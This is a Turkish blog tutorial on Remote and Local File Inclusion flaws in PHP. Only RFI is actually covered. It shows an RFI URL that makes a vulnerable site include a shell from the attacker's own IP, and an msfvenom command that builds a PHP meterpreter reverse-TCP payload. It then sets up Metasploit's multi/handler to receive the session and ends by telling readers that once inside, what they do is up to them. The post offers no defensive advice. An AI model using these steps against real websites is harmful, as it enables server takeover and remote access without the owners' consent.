Merhabalar , bu yazımda web alanında sıkça karşılaşılan ve exploiti bi o kadar kolay olan aynı zaman da da birbirine çok benzeyen iki konuyu ele alacağım.Bunlar RFI (Remote File Inclusion ) ve LFI (Local File Inclusion ).

RFI & LFI Nedir ?

RFI uzaktan dosya dahil etme,yükleme anlamı taşır.Bu zafiyet PHP dilinde bulunan #include fonkdiyonun hatalı kullanılmasıyla ortaya çıkmaktadır ve asıl mantığı açığın bulunduğu siteye yüklenen dosyaların içeriğinin kontrolünün sağlanamamasından kaynaklanmaktadır.Örneğin site resim dosyası yüklemek için bir araç çalıştırıyor olsun ,bu resim dosyasını alıp servera gönderiyor olarak düşünelim.Biz bu noktada resim dosyası değil de bir reverse shell verebilecek zararlı yazılım çalıştırdığımızda ,dosyaları ayırt etmeksizin yine servera yükleyecek ve tetikleyici olarak dosyayı yüklediğimiz url ye gidersek zararlıyı hedef makine de çalıştırmış oluyoruz .

RFI zafiyetli site url

Görüldüğü üzere site de id= den sonraki kısım servera gidip çalıştırılıyor.Biz zararlı dosyasyı siteye yükledik diyelim (resim yükleme veya başka dosya uzantı yükleme yerine) bundan sonraki işlem o dosyanın bulunduğu url yi çalıştırmaktır.Örneğin url

http://website.com/upload?id=http://ip adresimiz/shell kodu

şeklinde yazarak istek attığımız da bize bir kod ekranı gelecektir ,bu da demek oluyor ki hedef sistemde shell aldık.

Burdaki shell koduna değineceğim.Shell kodunu ister kendimiz oluştururuz ,ister exploit-db den indirebiliriz.Msfvenom aracı ile kendimiz yazalım.

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php

bu kodu yazdıktan sonra local portta yayın yapan bir reverse_shell zararlımız olmuş oldu.Daha farklı kodlar için tıklayın.

multi handler modülü

Bunu yaptıktan sonra gelen isteği yakalamak için multi/handler modulu ile dinleme açabiliriz.

Gereken her şeyi set ettikten sonra exploit diyerek meterpreter alabiliriz.Artık içerdeyiz ne yapacağınız size kalmış 🙂

No responses yet

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir